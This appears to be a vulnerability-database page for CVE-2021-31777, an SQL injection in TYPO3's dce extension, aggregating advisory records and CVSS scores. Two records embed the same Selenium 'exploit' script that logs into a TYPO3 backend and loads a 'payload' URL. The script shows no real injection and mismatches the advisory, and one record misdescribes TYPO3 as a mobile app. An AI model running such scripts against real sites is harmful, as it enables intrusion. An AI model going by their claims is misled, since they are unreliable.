Description
The dce (aka Dynamic Content Element) extension 2.2.0 through 2.6.x before 2.6.2, and 2.7.x before 2.7.1, for TYPO3 allows SQL Injection via a backend user account.
Affected Software
Related
{"id": "GHSA-5V5H-4W2G-GXXC", "vendorId": null, "type": "github", "bulletinFamily": "software", "title": "SQL Injection in t3/dce", "description": "The dce (aka Dynamic Content Element) extension 2.2.0 through 2.6.x before 2.6.2, and 2.7.x before 2.7.1, for TYPO3 allows SQL Injection via a backend user account.", "published": "2021-06-08T20:12:23", "modified": "2022-08-13T03:06:29", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 4.0}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 4.9, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 1.2, "impactScore": 3.6}, "href": "https://github.com/advisories/GHSA-5v5h-4w2g-gxxc", "reporter": "GitHub Advisory Database", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2021-31777", "https://bitbucket.org/ArminVieweg/dce/commits/998a2392f69f2153797c5ace6e8914ca309e70c7", "https://excellium-services.com/cert-xlm-advisory/", "https://packagist.org/packages/t3/dce", "https://typo3.org/security/advisory/typo3-ext-sa-2021-005", "http://packetstormsecurity.com/files/162429/TYPO3-6.2.1-SQL-Injection.html", "https://github.com/advisories/GHSA-5v5h-4w2g-gxxc"], "cvelist": ["CVE-2021-31777"], "immutableFields": [], "lastseen": "2022-08-13T05:00:08", "viewCount": 20, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-31777"]}, {"type": "osv", "idList": ["OSV:GHSA-5V5H-4W2G-GXXC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162429"]}, {"type": "typo3", "idList": ["TYPO3-EXT-SA-2021-005"]}, {"type": "zdt", "idList": ["1337DAY-ID-36182"]}], "rev": 4}, "score": {"value": 5.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-31777"]}, {"type": "kitploit", "idList": ["KITPLOIT:3449843613571411531"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162429"]}, {"type": "typo3", "idList": ["TYPO3-EXT-SA-2021-005"]}, {"type": "zdt", "idList": ["1337DAY-ID-36182"]}]}, "exploitation": null, "vulnersScore": 5.3}, "_state": {"dependencies": 1660367014, "score": 1660367230}, "_internal": {"score_hash": "aebfd88601bf0bed5c882a79fac0c65c"}, "affectedSoftware": [{"version": "2.2.0", "operator": "ge", "ecosystem": "COMPOSER", "name": "t3/dce"}, {"version": "2.6.2", "operator": "lt", "ecosystem": "COMPOSER", "name": "t3/dce"}]}
{"cve": [{"lastseen": "2022-03-23T18:08:09", "description": "The dce (aka Dynamic Content Element) extension 2.2.0 through 2.6.x before 2.6.2, and 2.7.x before 2.7.1, for TYPO3 allows SQL Injection via a backend user account.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "baseScore": 4.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-28T07:15:00", "type": "cve", "title": "CVE-2021-31777", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31777"], "modified": "2021-08-27T13:59:00", "cpe": [], "id": "CVE-2021-31777", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31777", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": []}], "typo3": [{"lastseen": "2021-08-10T12:23:56", "description": "The extension fails to properly sanitize user input and is susceptible to SQL Injection. A TYPO3 backend user account is required to exploit the vulnerability.\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-04-27T00:00:00", "type": "typo3", "title": "SQL Injection in extension \"Dynamic Content Element\" (dce)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31777"], "modified": "2021-04-27T00:00:00", "id": "TYPO3-EXT-SA-2021-005", "href": "https://typo3.org/security/advisory/typo3-ext-sa-2021-005", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "cnvd": [{"lastseen": "2022-08-27T04:54:48", "description": "TYPO3 Dynamic Content Element is a mobile application from the Swiss company TYPO3. TYPO3 Dynamic Content Element has a SQL injection vulnerability, which stems from insufficient filtering of user-supplied data and can be exploited by attackers to inject SQL to obtain data-sensitive information.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "baseScore": 4.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-28T00:00:00", "type": "cnvd", "title": "TYPO3 Dynamic Content Element SQL\u6ce8\u5165\u6f0f\u6d1e", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31777"], "modified": "2022-03-10T00:00:00", "id": "CNVD-2022-17988", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-17988", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "osv": [{"lastseen": "2022-09-19T03:19:37", "description": "The dce (aka Dynamic Content Element) extension 2.2.0 through 2.6.x before 2.6.2, and 2.7.x before 2.7.1, for TYPO3 allows SQL Injection via a backend user account.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "baseScore": 4.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T20:12:23", "type": "osv", "title": "SQL Injection in t3/dce", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31777"], "modified": "2022-09-19T03:02:49", "id": "OSV:GHSA-5V5H-4W2G-GXXC", "href": "https://osv.dev/vulnerability/GHSA-5v5h-4w2g-gxxc", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2021-05-03T20:54:34", "description": "", "published": "2021-05-03T00:00:00", "type": "packetstorm", "title": "TYPO3 6.2.1 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-31777"], "modified": "2021-05-03T00:00:00", "id": "PACKETSTORM:162429", "href": "https://packetstormsecurity.com/files/162429/TYPO3-6.2.1-SQL-Injection.html", "sourceData": "`# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on backend.php \n# Author: @nu11secur1ty \n# Testing and Debugging: @nu11secur1ty \n# Date: 05.02.2021 \n# Vendor: https://typo3.org/ \n# Link: https://get.typo3.org/version/6.2.1 \n# CVE: CVE-2021-31777 \n# Proof: https://streamable.com/8v7v4i \n \n[+] Exploit Source: \n \n#!/usr/bin/python3 \n# Author: @nu11secur1ty \n# CVE-2021-31777 \n \nfrom selenium import webdriver \nimport time \nimport os, sys \n \n \n# Vendor: https://typo3.org/ \nwebsite_link=\"http://192.168.1.3/typo3_src-6.2.1/typo3/index.php\" \n \n# enter your login username \nusername=\"nu11secur1ty\" \n \n# enter your login password \npassword=\"password\" \n \n#enter the element for username input field \nelement_for_username=\"username\" \n \n#enter the element for password input field \nelement_for_password=\"p_field\" \n \n#enter the element for submit button \nelement_for_submit=\"commandLI\" \n \n \n#browser = webdriver.Safari() #for macOS users[for others use chrome vis \nchromedriver] \nbrowser = webdriver.Chrome() #uncomment this line,for chrome users \n#browser = webdriver.Firefox() #uncomment this line,for chrome users \n \ntime.sleep(3) \nbrowser.get((website_link)) \n \ntry: \nusername_element = browser.find_element_by_name(element_for_username) \nusername_element.send_keys(username) \npassword_element = browser.find_element_by_name(element_for_password) \npassword_element.send_keys(password) \nsignInButton = browser.find_element_by_name(element_for_submit) \nsignInButton.click() \n \n# Exploit vulnerability MySQL user table by using backend.php vulnerability \ntime.sleep(3) \n# Payload link \nbrowser.get((\" \nhttp://192.168.1.3/typo3_src-6.2.1/typo3/alt_doc.php?edit[be_users][1]=edit&returnUrl=mod.php%3FM%3Dsystem_BeuserTxBeuser%26moduleToken%3D56862cd856952bfd539277eebf7b21c2a85ff950#\")) \n \n \nprint(\"The payload is deployed it is time to destroy some user...\\n\") \nos.system('pause') \n \nbrowser.close() \n \nexcept Exception: \n#### This exception is if the user is not found in the database or \nsomething is wrong. \nprint(\"Sorry, but this user who you searching for is destroyed by using of \nMySQL vulnerability in backend.php...\") \n \n--------------------------------- \n \n# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on \nbackend.php \n# Date: 05.02.2021 \n# Exploit Authotr idea: @nu11secur1ty \n# Exploit Debugging: @nu11secur1ty \n# Vendor Homepage: https://typo3.org/ \n# Software Link: https://get.typo3.org/version/6.2.1 \n \n# Steps to Reproduce: \nhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-31777 \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/162429/typo3621-sql.txt"}], "zdt": [{"lastseen": "2021-11-04T04:24:32", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-05-04T00:00:00", "type": "zdt", "title": "TYPO3 6.2.1 SQL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31777"], "modified": "2021-05-04T00:00:00", "id": "1337DAY-ID-36182", "href": "https://0day.today/exploit/description/36182", "sourceData": "# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on backend.php\r\n# Author: @nu11secur1ty\r\n# Testing and Debugging: @nu11secur1ty\r\n# Vendor: https://typo3.org/\r\n# Link: https://get.typo3.org/version/6.2.1\r\n# CVE: CVE-2021-31777\r\n# Proof: https://streamable.com/8v7v4i\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python3\r\n# Author: @nu11secur1ty\r\n# CVE-2021-31777\r\n\r\nfrom selenium import webdriver\r\nimport time\r\nimport os, sys\r\n\r\n\r\n# Vendor: https://typo3.org/\r\nwebsite_link=\"http://192.168.1.3/typo3_src-6.2.1/typo3/index.php\"\r\n\r\n# enter your login username\r\nusername=\"nu11secur1ty\"\r\n\r\n# enter your login password\r\npassword=\"password\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n\r\n#enter the element for password input field\r\nelement_for_password=\"p_field\"\r\n\r\n#enter the element for submit button\r\nelement_for_submit=\"commandLI\"\r\n\r\n\r\n#browser = webdriver.Safari() #for macOS users[for others use chrome vis\r\nchromedriver]\r\nbrowser = webdriver.Chrome() #uncomment this line,for chrome users\r\n#browser = webdriver.Firefox() #uncomment this line,for chrome users\r\n\r\ntime.sleep(3)\r\nbrowser.get((website_link))\r\n\r\ntry:\r\nusername_element = browser.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = browser.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\nsignInButton = browser.find_element_by_name(element_for_submit)\r\nsignInButton.click()\r\n\r\n# Exploit vulnerability MySQL user table by using backend.php vulnerability\r\ntime.sleep(3)\r\n# Payload link\r\nbrowser.get((\"\r\nhttp://192.168.1.3/typo3_src-6.2.1/typo3/alt_doc.php?edit[be_users][1]=edit&returnUrl=mod.php%3FM%3Dsystem_BeuserTxBeuser%26moduleToken%3D56862cd856952bfd539277eebf7b21c2a85ff950#\"))\r\n\r\n\r\nprint(\"The payload is deployed it is time to destroy some user...\\n\")\r\nos.system('pause')\r\n\r\nbrowser.close()\r\n\r\nexcept Exception:\r\n#### This exception is if the user is not found in the database or\r\nsomething is wrong.\r\nprint(\"Sorry, but this user who you searching for is destroyed by using of\r\nMySQL vulnerability in backend.php...\")\r\n\r\n---------------------------------\r\n\r\n# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on\r\nbackend.php\r\n# Date: 05.02.2021\r\n# Exploit Authotr idea: @nu11secur1ty\r\n# Exploit Debugging: @nu11secur1ty\r\n# Vendor Homepage: https://typo3.org/\r\n# Software Link: https://get.typo3.org/version/6.2.1\r\n\r\n# Steps to Reproduce:\r\nhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-31777\n\n# 0day.today [2021-11-04] #", "sourceHref": "https://0day.today/exploit/36182", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}]}
SQL Injection in t3/dce
